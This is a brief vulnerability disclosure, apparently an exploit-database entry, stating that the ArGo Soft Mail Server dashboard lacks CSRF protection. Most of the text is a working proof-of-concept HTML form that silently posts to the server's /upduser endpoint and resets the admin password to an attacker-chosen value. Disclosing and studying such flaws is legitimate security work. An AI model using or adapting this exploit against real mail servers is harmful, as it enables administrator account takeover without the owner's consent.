Website: https://www.argosoft.com/rootpages/MailServer/Default
The ArGo Soft Mail Server dashboard does not have protection against attacks of the type Cross Site Request Forgery (CSRF), making it possible to use the exploit below to change the admin password:
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://192.168.56.105:80/upduser">
<input type="text" name="realname" value="admin">
<input type="text" name="password" value="hack">
<input type="text" name="confirmpassword" value="hack">
<input type="text" name="forwardaddress" value="">
<input type="text" name="keepcopies" value="N">
<input type="text" name="returnaddress" value="">
<input type="text" name="fingerinfo" value="">
<input type="text" name="respondersubject" value="">
<input type="text" name="responderdata" value="">
<input type="submit" value="Send">
</form>
</body>

